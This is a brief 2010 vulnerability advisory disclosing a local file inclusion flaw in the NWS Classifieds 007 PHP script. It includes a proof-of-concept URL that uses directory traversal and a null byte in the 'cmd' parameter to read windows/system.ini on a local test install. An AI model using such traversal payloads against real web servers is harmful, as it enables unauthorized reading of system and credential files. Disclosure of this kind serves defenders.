------------------------------------------------------------------------
Software................NWS Classifieds 007
Vulnerability...........Local File Inclusion
Download................http://webscripts.softpedia.com/script/Ad-Management/Classified-Ads/NWS-Classifieds-35000.html
Release Date............9/15/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------

--Description--

A local file inclusion vulnerability in NWS Classifieds 007 can be
exploited to include arbitrary files.


--PoC--

http://localhost/nws_classifieds007/index.php?cmd=../../../../../../../../windows/system.ini%00